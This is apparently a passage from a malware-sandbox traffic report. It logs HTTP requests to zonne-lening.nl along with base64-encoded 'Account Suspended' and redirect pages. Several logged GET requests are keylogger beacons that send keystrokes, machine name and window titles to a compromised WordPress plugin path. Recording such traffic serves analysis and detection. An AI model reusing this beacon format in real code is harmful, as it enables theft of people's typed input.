cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 22:54:35 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
36 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:54%20PM text/html post.php 302 Found HTML 379.0 B 03/18/60 19:37:57
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9QzolNUNVc2VycyU1Q0FkbWluaXN0cmF0b3IlNUNE
ZXNrdG9wJTVDbWFsd2FyZSZhbXA7a2V5c3Ryb2tlc3R5cGVkPSZhbXA7bWFjaGluZXRpbWU9Mjo1
NCUyMFBNIj5oZXJlPC9hPi48L3A+CjwvYm9keT48L2h0bWw+Cg==
Download
Download
SHA256
cad874f6ed189e6d5ed77910e5a0c91d16f34de0c4f8b297ac90fb9c2a2d7443
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 302 Found
Date: Fri, 02 Dec 2016 22:54:38 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:54%20PM
Content-Length: 379
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
37 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:54%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 03/18/60 20:19:44
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
YXdlc29tZS5taW4uY3NzIj4KICAgIDxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+CiAgICAgICAgYm9k
eSB7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
OwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGxpbmUtaGVpZ2h0OiAx
LjQyODU3MTQyOTsKICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogI2ZmZmZmZjsKICAgICAg
ICAgICAgY29sb3I6ICMyRjMyMzA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAg
IG1hcmdpbjogMDsKICAgICAgICB9CiAgICAgICAgc2VjdGlvbiB7CiAgICAgICAgICAgIGRpc3Bs
YXk6IGJsb2NrOwogICAgICAgICAgICBwYWRkaW5nOiAwOwogICAgICAgICAgICBtYXJnaW46IDA7
CiAgICAgICAgfQogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICBtYXJnaW4tbGVmdDog
YXV0bzsKICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiBhdXRvOwogICAgICAgICAgICBwYWRkaW5n
OiAwIDEwcHg7CiAgICAgICAgfQogICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAg
ICBiYWNrZ3JvdW5kLXJlcGVhdDogbm8tcmVwZWF0OwogICAgICAgICAgICBiYWNrZ3JvdW5kLWNv
bG9yOiAjMjkzQTRBOwogICAgICAgICAgICBjb2xvcjogI0ZGRkZGRjsKICAgICAgICB9CiAgICAg
ICAgLmFkZGl0aW9uYWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHg7CiAg
ICAgICAgICAgIG1pbi1oZWlnaHQ6IDE5M3B4OwogICAgICAgIH0KICAgICAgICAuaW5mby1oZWFk
aW5nIHsKICAgICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGQ7CiAgICAgICAgICAgIHRleHQtYWxp
Z246IGxlZnQ7CiAgICAgICAgICAgIHdvcmQtYnJlYWs6IGJyZWFrLWFsbDsKICAgICAgICAgICAg
d2lkdGg6IDEwMCU7CiAgICAgICAgfQogICAgICAgIC5zdGF0dXMtcmVhc29uIHsKICAgICAgICAg
ICAgZm9udC1zaXplOiAyMDAlOwogICAgICAgICAgICBkaXNwbGF5OiBibG9jazsKICAgICAgICAg
ICAgY29sb3I6ICNDQ0NDQ0M7CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAg
ICAgICAgIG1hcmdpbjogMjBweCAwOwogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7CiAgICAg
ICAgfQogICAgICAgIC5pbmZvLWhlYWRpbmcgewogICAgICAgICAgICBmb250LXNpemU6IDE5MCU7
CiAgICAgICAgfQogICAgICAgIC5yZWFzb24tdGV4dCB7CiAgICAgICAgICAgIGZvbnQtc2l6ZTog
MTQwJTsKICAgICAgICB9CiAgICAgICAgQG1lZGlhIChtaW4td2lkdGg6IDc2OHB4KSB7CiAgICAg
ICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0
aXZlOwogICAgICAgICAgICAgICAgb3ZlcmZsb3c6IGhpZGRlbjsKICAgICAgICAgICAgICAgIGJh
Y2tncm91bmQtaW1hZ2U6IG5vbmU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLmFkZGl0aW9u
YWwtaW5mby1pdGVtcyB7CiAgICAgICAgICAgICAgICBwYWRkaW5nOiAyMHB4OwogICAgICAgICAg
ICB9CiAgICAgICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICAgICAgd2lkdGg6IDkwJTsK
ICAgICAgICAgICAgfQogICAgICAgICAgICAuc3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAg
ICBkaXNwbGF5OiBpbmxpbmU7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgQG1lZGlh
IChtaW4td2lkdGg6IDk5MnB4KSB7CiAgICAgICAgICAgIC5hZGRpdGlvbmFsLWluZm8gewogICAg
ICAgICAgICAgICAgYmFja2dyb3VuZC1pbWFnZTogdXJsKGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxp
VkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBUEFBQUFEcUNBTUFBQUNyeGpoZEFBQUF0MUJNVkVVQUFB
QUFBQUQvLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy81K2ZuLy8vLy8v
Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy82K3ZyLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v
Ly8vLy8vLy8vLy8vK2k1ZWRUQUFBQVBYUlNUbE1BQVFFQ0F3UUZCZ2NJQ1FvTERBME9EeEFSRWhN
VUZSWVhHQmthR3h3ZEhoOGdJU0lqSkNVbUp5Z29LU29yTEMwdUx6QXdNVEl6TkRVMk56ZzVIN3gw
WEFBQUNuZEpSRUZVZUFIdFhYbHpHczhSN1RRM0NGa0h4cEt4aEl3dElCd2dJdVlZNHUvL3VWSjJx
cExLRDdROHQyWjd4cEQzbjZza2E5LzJiTTlNdno2b0dFeVhGb0tIZm1oZW9ld3g5Y1llaFZ1UEhN
VDRqcGh5QnROSHhIUW1ER2dCdlpqWEJ1V04yZ29nYlB5NlJ0Y09lak5QeEZrYitDRVloSENmbUo2
RFFTaGZFR2ZNdDcxRk9QZ3BFMVBIT01URVk4b1ozeUNyMlV0aUlucUVmdGozaUxNMThBZnN1L3hL
djlCNFFVenNWMVhLRlR6RFBHK0xmb0xwRS9Makpuek8wOFFDQXVnTGFsS2VxUC9tRW1XNlFqK0JQ
SUU3SVltVHl3MU1Gd2Jha3NheWJTeERDQTRTVEYrd2c4ckg3RXpNd3FOaWJZMzhtbHZYS0RkVTVw
REgzVFJrbDQwdnhKa1orRE8yTnUvM0hueUM3dDE1b2JHQnRxUkZSWG82KzBaNVlRaDVMSGQ5WUdX
T3NGKzlJczVvUVhjdFpLYnZkQUF0YkhITTgrR0xmb2pXZElnUGZmN1lpZlJUTmlabXVzVyt3OGZE
ajF4ZGV2Tm5iVTNWRmZURUwvVzMzcGZIMzFjR1lCcGdXOUxiYTNJYzhDOGlBNzdOTGU1MTR2dThC
UGo2L24zbENkL1ZrZ0tYR2t3WVVRSEFhTSt5UXVuQm1OU3diUlZZaCtrT2NnTWh2UkRCMU1kMjBZ
ZmlSK1VGZnZkSWl6cDJ2MXZWanQwdXNhMXBtTnpBWDJJRmw1L3hhRTlhcVFHU0Q2YnhJMFJaU3cz
dXVGMFlqUUhlcGpNeEhtZDlJZ0MxTmJZMVZTa2RlQjR2WE1IMEtTUVZJdlFmRVJjaU1wY2FGdFc0
SDhpSTBnQjJNemZFY1YzZ0IrSWtmRHRieUNBVGd0SEI3bDNUcktVRzJ5V09lN08yS1lRSVBFN3hG
RDEyWXZ5NlN2cW9MT01mOTVrK0J2Z3FvZ0NGQ3gyMk5kbHRPMWVwWWM3eWNFS1NhSTkrVUFZUEdP
bEtEUVl5eERQOU5wcXYwTktaa1M3R3VOUlFpZzVwdmFZUXdkVHp0alJuQ3JyL2wwYjJVZ08rd1J0
TWlGQ0F6cXBMTDBTbytoV21pNjFObjNhcUtHRXpEZkZybUVvS3FjV1NGRFJPTlNyQVUwaUZZTHJI
VTJSS0IzcStIeERIVDRKS0VlMnByaHhZMWFDUzVsWStIblh1Nk4reDZJSkNSUVFtRUV6K1lqSUUv
eHMvTW1EOHFIUllLNUNBSHVhVFk1amZReEZDL1lvSVFTU1ZhZnJEK1dLNEgwUGl2OFNBVFJaQ2hF
WGlPczM5TC9JWXdpT3hSSGdlRUtjbWJNSTljY0hSQ2R4VWVZYW5GcFFKTUJVRElGeHcxY2hKaUJB
b21rejN4NDNsK251V0dtV2hrUXMwYTZZN1lIVmU3NzJtMXRabFVCRWhLSTlrNm51TEU4YnpLVlNF
Q0VIZUNaU3lzcjA0cUpHblR6c1Z4Sm9Rd203YlBoUTdjemE1RUNHUUdwZzZUbmp6bVdCYlU3dEV4
a2hWdzM2eXozSENtMHFFdkVaOUM3dkRZWmVXQVFobktrUVVHL2k3TkRuQ0wvaHdidkpyNm1pUEtI
VGFPRTU0eHBCR3JsOFJJWEtYMWJrMytBMWFVaEh4VXRlM3NIRXZOU0lwNFJFZEJOT05BOU5PV1lF
d3VxNTRBaFBleDNOYUlRTHdISUlRbFFrUGJ3c1JGcGRtZGIvaEQ4VFNEQ3dUQnU4VzMwc1NJaVM3
UDlOd1o3Q2dBZURqbGFNOWt0QUQwK014d3JzZThYc1RhTW9SSW9DYVptZzNCUWdMcXJIVkNCdTNx
aFczK0FBT2h3cDUyUUlBZlFrQXdvREhLemZORVljazRaUHA1cWg1Q3A0VkZpTDhXTS9DbDhTRjRw
Z3RodnRIbTRxUVVJaVFkWSs1Tk1mdS8yMjhQa3EzTlpOTXFEMVc3ck1ucndKZVFFbUl3S3NhY01J
L1RWT0xsSGpRak0xWVZ0VlEzUndodk9SbzNja2lRNVpPVXpsQ09NeWk5WitMWFJFaFM1aXFySTRR
bnVObGY4b1ZFYks4QTU1NlFRSzBMTnJUajJ0aVdmY0ZuaDBoUElwWUVWR2ptQkFlMmI5NVUzd014
aW9pRXJSbTJudWhkOFFSQ0E4SXdUUkFXMU83UEFzYnRDUHlNTWdKcCsxL0lheHFHQVJ6ckZ0dHBo
VVIrTXZFUFN4KzZtL3BDeEVpM1k3cDQ4NUVTQVZtdWxkdnpTVEt3MmZxSFNHTTVoQlcxSVVJMGYv
TGRPTnRFVUtYR0M5NWpLK1JnNFFCVndObWxlUFpWalR4dW8yNGtXTXJRSGcvblp6eERxbXFGUkZD
Nzk5K2RiRWlyTW9WRVhoVkEwN1krR1dOTU9CQ3hJSXBDZ0NwQVg1S2dIQjZJUUlMSHdFM0hYazJY
UVZzemRTa0dFQ2pVQUJoUExNZFQvdUtMMFJJUThEellPS0p1OThWMDA2TGJTSWt2QnNSbHpCUFlr
SVJJSDE3NDNpRWllbEJUNGlRUmtOSHdVUU1VdFRXWHFzaVF1Z0Jpd2w3M09PclYwUklxLzYrQklQ
UFZWTHJiQVZBdWxRS0l3QU8vOWpVS3lKazUxU21PNXd3aHBIWGFjMEUzRVFFZlJJdTZUZkJZTFFu
L0ozZUNjRmRFN2k0ZHdtSGNrV0VySnNtVTdlSXNHbkx4cFZwVkVUSTRrVk0zVkNVdzErWGRSUFJh
TTBrNjRqTDFMRUZrQkJHUnc3YWQxWkUrQVZINzRYaDhOUU0vZFpNeFZLRGtQQ3lXbWJQSi84dUlR
Si9YYmlMOGJOS3Z2MHZXbExDYjBmUWpSOXp1VTF5K3NTa2pjcXNnUEF6Q1ZHRld6UHBZeEpNOUdB
TVhoR1JpbkQ4NXhrckN4RW9tRVk3STdqLzQwSUV2aldsSjd3RHpqSlp0bWJDVy9jQ2hPUFB0bElD
TUdYSUFYM1FGWVFJUmNJM0NxMlpOazN0WWR1dW5QeElwdXM4Sm9MaTVlMXUyeVdOMWt4ZDNVVjlW
WEFkdm5qbnRJa3NoMVYzQlNlL0RJVUlIQmRSQ01NVjZPbkhydFczYnhjOFZKVm1QUStJRlFtYnR5
VWdlamVtNlZzendhTko1SVFUOXI4QVVGMDQvRG9NSStOaDFaVzVNNGNoSjV5dU5STUFudjdUaDBQ
d1A3NHBUbDlValBaOEdqMTlQWVNuMFMxRlFHMlZmR3ZTUHF4cnA1Mm1CTjZJMjVuMkNUQk9PUkUw
LzZHaVZuOVlOZjhiRkJkNFJVUkZsV3pCdnlCRXFJaTRJOWFreSsycjI5NTk3L1pENjIreEtWZkJ0
Tk02cWFIUkc2MWVyWFBCT2ZPNkhON1VZbEptdXNscFdEVVRkWWFiNEwyejF2NDBoUFBCdnd6cU9s
dVR2aERCVkIyYTRJeXgvNFV4THJ4OGdveWNXMFVFZ080eTJMM0grVWw1WEkvNHZvYzZyWmtBM0Jw
djNuamZTL25oUjc4MUU1NE42dDRPZVd4UXh1a25ndUoxUzg0QVJSNFJ3QXF0bWFDRlpuUmlMMmxi
TStIYUFDNW5wcStJd0YrNmhoZkJXek5ObFc2cUNyR1hSeXphMHlOT2QxRTFmc1lVQzdVVjJKb3A3
WHlYYnN3OTBLWVVJbmpwa1JjZWNXZmtFbWRDQWVoZ3VldVRtTnQrc2hrUmVLZDN2NjduUDljTkRK
SHZvRCsreGR2cG92WEtDcDVTZm9HeEhzajB5RitJd0hVdXM3c21WaDhJSFZHSXdKdEx5N3VONlBl
L3dBbnJCeE9uQWF5SVNMV2tROHdvQkt5UisrZFVUc3VFSytMOHAyQkQ0Zkdkc2ZxaHhHUVRRWmx1
SFVMWHJSc1VGZkJFME9neklscmFSOHZrdzZxblhtdURTRjhSZ1M4dGgrZCtwaGNpOEZKZjFmd2Fw
aTQ0ckZwZnFUWkFuVytKRlJHM2tmOTRaK3NTcWRSMVVJaUkvZGMvQjZOL005V3NpQURPMDBBM1FV
MGhvaFg1UlRkZUNyc3R5VDFXcGhVUlRCZXZCYVY0aXdZSkdHY3RSREMxRnNHYVEzUnRHRmZMNG9z
MzRnNlQrQWtBVDg0YnMwZlgyd2VTODhYN1g2aFhSRERSemR3SFovNUQyaGpqZ2h0M01iNXkxTklO
cStiZVpCdThkODQ2NTd3UFlmTjhwWkJjMGcrSktpS1lpTnI5cjR2MVpydmRidGF6cDE2VFNDT2Za
cHBNaUdENmlWcXIyNzFvVm9rVTZBSjlVNUZHblhJd3c1bUgra0xFaHhJMWNsMjBRQ0dDVGdSTUEv
MytGMmxSWFh0elhoVVJQVFR0OUdRQTZoK2QvMWRFNUFuOUdSSDVvNW13SWdLSHZoQ0JpNWo2MEJj
aThvZStFS0VQclltZytRTk5PdzNQZENMZ3BCVVJPUFExOG1YMVpFeDhwOS8vSWkwcWMzUWk2Q21B
VTFkRXBEOVNBMXRUOTgvR1phZHZmMjlHeFBZUGg5bitNakF1Uk5nL0hjNFdZbThXalQwcEFCTkI3
V2tBYjgxa3o4ZkVvNU5hMHJBUVlVOEtRRVdFUFNrQWFhZm5SUGlYRUdIUENDYmNueHBoSUVQUG5o
WGM5WGtSTnVIaDNDdzhKWHRlZUNWN1pqZy93dWE4WUdsM1h2RFVQeS9jL0F2ZDQvaE5EU3FlZ1FB
QUFBQkpSVTVFcmtKZ2dnPT0pOwogICAgICAgICAgICB9CiAgICAgICAgICAgIC5jb250YWluZXIg
ewogICAgICAgICAgICAgICAgd2lkdGg6IDcwJTsKICAgICAgICAgICAgfQogICAgICAgICAgICAu
c3RhdHVzLXJlYXNvbiB7CiAgICAgICAgICAgICAgICBmb250LXNpemU6IDQ1MCU7CiAgICAgICAg
ICAgIH0KICAgICAgICAgICAgLmluZm8taGVhZGluZyB7CiAgICAgICAgICAgICAgICBmb250LXNp
emU6IDIwMCU7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgLnJlYXNvbi10ZXh0IHsKICAgICAg
ICAgICAgICAgIGZvbnQtc2l6ZTogMTYwJTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIDwv
c3R5bGU+CiAgICA8L2hlYWQ+CiAgICA8Ym9keT4KICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWlu
ZXIiPgogICAgICAgICAgICA8c3BhbiBjbGFzcz0ic3RhdHVzLXJlYXNvbiI+CiAgICAgICAgICAg
ICAgICA8aSBjbGFzcz0iZmEgZmEtdXNlci10aW1lcyBmYS0yeCI+PC9pPiBBY2NvdW50IFN1c3Bl
bmRlZAogICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPHNlY3Rpb24g
Y2xhc3M9ImFkZGl0aW9uYWwtaW5mbyI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5l
ciI+CiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJhZGRpdGlvbmFsLWluZm8taXRlbXMiPgog
ICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImluZm8taGVhZGluZyI+CiAgICAgICAgICAg
ICAgICAgICAgICAgIFRoaXMgQWNjb3VudCBoYXMgYmVlbiBzdXNwZW5kZWQuCiAgICAgICAgICAg
ICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icmVhc29uLXRl
eHQiPgogICAgICAgICAgICAgICAgICAgICAgICBDb250YWN0IHlvdXIgaG9zdGluZyBwcm92aWRl
ciBmb3IgbW9yZSBpbmZvcm1hdGlvbi4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAg
ICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L3NlY3Rpb24+CiAg
ICA8L2JvZHk+CjwvaHRtbD4K
Download
Download
SHA256
17fa2f3324d45c27a318ed51dab739c7f09b573185b76889b955ad2c9ad1d7b8
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=C:%5CUsers%5CAdministrator%5CDesktop%5Cmalware&keystrokestyped=&machinetime=2:54%20PM HTTP/1.1
Host: zonne-lening.nl
Response Header
HTTP/1.1 200 OK
Date: Fri, 02 Dec 2016 22:54:38 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Transfer-Encoding: chunked
Content-Type: text/html
Response Peek (128 B)
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta http-equiv="...
38 /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:55%20PM text/html post.php 302 Found HTML 345.0 B 03/22/60 09:08:50
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+
PGhlYWQ+Cjx0aXRsZT4zMDIgRm91bmQ8L3RpdGxlPgo8L2hlYWQ+PGJvZHk+CjxoMT5Gb3VuZDwv
aDE+CjxwPlRoZSBkb2N1bWVudCBoYXMgbW92ZWQgPGEgaHJlZj0iaHR0cDovL3pvbm5lLWxlbmlu
Zy5ubC9jZ2ktc3lzL3N1c3BlbmRlZHBhZ2UuY2dpP3R5cGU9a2V5c3Ryb2tlcyZhbXA7bWFjaGlu
ZW5hbWU9V0lOMSZhbXA7d2luZG93dGl0bGU9cnVuZGxsMzIuZXhlJmFtcDtrZXlzdHJva2VzdHlw
ZWQ9JmFtcDttYWNoaW5ldGltZT0yOjU1JTIwUE0iPmhlcmU8L2E+LjwvcD4KPC9ib2R5PjwvaHRt
bD4K
Download
Download
SHA256
1a65e3638196f41d64b0e49969b751c43fe1459fbf33749de7cfc32d8d07170d
Referer
Magic
HyperText Markup Language (HTML)
Request
GET /wp-content/plugins/advanced-custom-fields/rajah/post.php?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:55%20PM HTTP/1.1
Host: zonne-lening.nl
Connection: Keep-Alive
Response Header
HTTP/1.1 302 Found
Date: Fri, 02 Dec 2016 22:55:09 GMT
Server: Apache/2.4.23 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Location: http://zonne-lening.nl/cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:55%20PM
Content-Length: 345
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Response Peek (128 B)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc...
39 /cgi-sys/suspendedpage.cgi?type=keystrokes&machinename=WIN1&windowtitle=rundll32.exe&keystrokestyped=&machinetime=2:55%20PM text/html suspendedpage.cgi 200 OK HTML 7.1 KB 03/22/60 10:02:04
PCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICA8bWV0YSBodHRwLWVxdWl2PSJD
b250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJDYWNoZS1jb250cm9sIiBjb250ZW50PSJuby1jYWNoZSI+CiAgICA8bWV0
YSBodHRwLWVxdWl2PSJQcmFnbWEiIGNvbnRlbnQ9Im5vLWNhY2hlIj4KICAgIDxtZXRhIGh0dHAt
ZXF1aXY9IkV4cGlyZXMiIGNvbnRlbnQ9IjAiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNv
bnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxl
PkFjY291bnQgU3VzcGVuZGVkPC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJl
Zj0iLy9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC4zLjAvY3NzL2ZvbnQt
